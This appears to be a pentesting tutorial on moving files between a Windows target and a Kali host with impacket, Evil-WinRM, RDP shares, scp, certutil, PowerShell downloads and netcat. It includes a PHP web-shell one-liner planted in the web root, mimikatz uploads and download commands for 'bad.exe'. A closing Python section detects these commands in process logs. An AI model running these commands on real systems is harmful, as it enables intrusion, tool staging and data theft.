Whether you are solving a machine/lab or engaged in a penetration testing assessment, there will be times when you need to transfer a file, either from your host to the target host (Windows/Linux) or vice versa. Here I share a few tricks for transferring files from a Windows machine to your Kali host.
With impacket we can use the utility impacket-smbserver to start an SMB server and use it to transfer files from Windows.
impacket-smbserver test . -smb2support -username jojomojo -password jojomojo
net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo
copy backup.zip m:\
Replace YOUR_KALI_IP with your Kali Linux host's IP.
Evil-WinRM has built-in commands, upload and download, which can be used to upload and download files respectively.
upload /path/to/sourcefile C:\path\to\destinationfile
upload /home/kali/Desktop/chisel.exe C:\Users\testuser\chisel.exe
download C:\path\to\sourcefile /path/to/destinationfile
download C:\Users\testuser\Desktop\backup.zip /home/kali/Desktop/backup.zip
Some of the impacket utilities, such as impacket-psexec, impacket-wmiexec and impacket-smbexec, have built-in commands, lput and lget, that can be used to upload and download a file.
A file uploaded with lput is placed in the C:\Windows directory.
C:\Windows\system32> lput mimikatz.exe
[*] Uploading mimikatz.exe to ADMIN$\/
C:\Windows\system32> cd C:\windows
C:\Windows> dir /b mimikatz.exe
mimikatz.exe
C:\Windows> lget mimikatz.log
[*] Downloading ADMIN$\mimikatz.log
If the Windows machine has an RDP port open, we can mount a shared folder and copy files.
rdesktop -z -P -x m -u jojomojo -p lab 192.168.1.120 -r disk:test=/path/to/your/shared/dir
copy mimikatz.log \\tsclient\test\mimikatz.log
SCP can be useful especially when transferring large files.
scp /home/kali/Desktop/bad.exe Administrator@192.168.1.102:'C:\Users\Administrator\Documents\good.exe'
scp Administrator@192.168.1.102:'C:\Users\Administrator\Documents\important_file.zip' /home/kali/Documents/
Base64 encoding/decoding can be used to transfer files to and from Windows.
Contents of webshell.php
└─$ cat webshell.php
<?php echo shell_exec($_GET['cmd']); ?>
To encode the contents of webshell.php as Base64, use either of these commands, then copy the output.
└─$ base64 -w0 < webshell.php
└─$ cat webshell.php | base64 -w0
# output
PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==
PS C:\Users\jojomojo\Documents> [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg==')) > C:\inetpub\wwwroot\shell.php
C:\Users\jojomojo\Documents> echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7ID8+Cg== > enc
C:\Users\jojomojo\Documents> certutil -decode .\enc C:\inetpub\wwwroot\shell.php
Run either of the commands below to start an HTTP web server.
python3 -m http.server 80
python2 -m SimpleHTTPServer 80
certutil.exe -urlcache -f http://192.168.1.120/test.exe bad.exe
curl -s -O http://192.168.1.102/test.exe
wget -O bad.exe http://192.168.1.102/test.exe
Invoke-WebRequest -Uri "http://192.168.1.102/test.exe" -OutFile "C:\Downloads\bad.exe"
iwr http://192.168.1.102/test.exe -OutFile "C:\Downloads\bad.exe"
nc 10.1.1.17 443 < /home/kali/Desktop/bad.exe
C:\Users\jojomojo\Test> nc.exe -l -p 443 > C:\Users\jojomojo\Documents\serviceRun.exe
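On the defending side, each Windows-side command above (certutil, iwr/wget/curl, net use against an IP share, copies to \\tsclient, an nc.exe listener) leaves a recognizable command line in process-creation logging. The following is an added example, not part of the original post: a small Python matcher for those command lines, where the rule names, host names and sample events are all constructed for illustration.

```python
import re

# Patterns for the Windows-side transfer commands shown on this page.
# Rule names are labels chosen for this example, not an existing rule set.
RULES = [
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b", re.I)),
    ("certutil_decode", re.compile(r"\bcertutil(\.exe)?\b.*[-/]decode\b", re.I)),
    ("web_download", re.compile(r"\b(invoke-webrequest|iwr|wget|curl)\b.*\bhttps?://", re.I)),
    ("base64_to_file", re.compile(r"frombase64string\(.*\).*>", re.I)),
    ("smb_share_by_ip", re.compile(r"\bnet(\.exe)?\s+use\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I)),
    ("rdp_drive_copy", re.compile(r"\\\\tsclient\\", re.I)),
    # A listen flag must start its own argument, so "my-file.bin" does not match.
    ("netcat_listener", re.compile(r"\bnc(at)?(\.exe)?\s(.*\s)?-[a-z]*l[a-z]*(\s|$)", re.I)),
]

# Constructed process-creation records (host, command line).
# Addresses come from the documentation range 192.0.2.0/24.
SAMPLE_EVENTS = [
    ("WS01", r"certutil.exe -urlcache -f http://192.0.2.10/test.exe out.exe"),
    ("WS01", r"certutil -decode .\enc C:\Temp\out.bin"),
    ("WS02", r"powershell iwr http://192.0.2.10/test.exe -OutFile C:\Temp\out.exe"),
    ("WS02", r"powershell [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('QUJD')) > C:\Temp\a.txt"),
    ("WS03", r"net use m: \\192.0.2.10\test /user:labuser labpass"),
    ("WS03", r"cmd /c copy report.log \\tsclient\test\report.log"),
    ("WS04", r"nc.exe -l -p 443 > C:\Temp\in.bin"),
    ("WS05", r"certutil -hashfile C:\Temp\setup.msi SHA256"),  # benign use of certutil
    ("WS05", r"net use p: \\fileserver01\projects"),           # benign named file server
]

def match_rules(cmdline):
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def triage(events):
    """Map host -> sorted rule names seen on that host; hosts with no hit are omitted."""
    hits = {}
    for host, cmdline in events:
        for name in match_rules(cmdline):
            hits.setdefault(host, set()).add(name)
    return {host: sorted(names) for host, names in hits.items()}

if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(host, ", ".join(names))
```

The same patterns can be pointed at exported command-line fields from whatever process-creation logging is enabled; expect to tune them against administrators' legitimate use of certutil and curl.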
Although there are more methods and techniques for transferring files, the few mentioned above are the most commonly used in pentesting scenarios and let you easily transfer files from Windows to your Kali Linux host.